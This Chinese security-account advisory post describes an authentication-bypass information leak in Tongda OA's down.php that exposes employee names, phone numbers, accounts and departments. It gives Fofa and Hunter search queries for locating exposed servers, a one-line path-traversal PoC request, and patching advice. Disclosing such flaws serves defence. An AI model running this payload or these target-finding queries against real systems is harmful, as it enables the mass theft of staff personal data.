安全情报，X达OA down.php 存在信息泄露漏洞！！！

原创 Ax 极星信安 2024-04-27 17:46

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，禁止私自转载，如需转载，请联系作者！！！！

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关！！！！！

漏洞介绍

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件，
存在一个认证绕过漏洞，利用该漏洞下载获取系统内所有员工信息，包括手机号、姓名、账号、部门等敏感信息。

影响版本

通达 OA

漏洞情报

搜索引擎语法

Fofa：app="TDXK-通达OA"
Hunter：app.name="通达 OA"

POC

/inc/package/down.php?id=../../../cache/org

修复建议

建议及时更新至最新版本或者使用WAF安全设备防护！

关注我们

公众号回复“2024Hw应急工具”获取Hw应急工具集

公众号回复“简历模版”获取
Hw简历模版

**公众号回复“2024面经大全”获取全套面经以及回答思路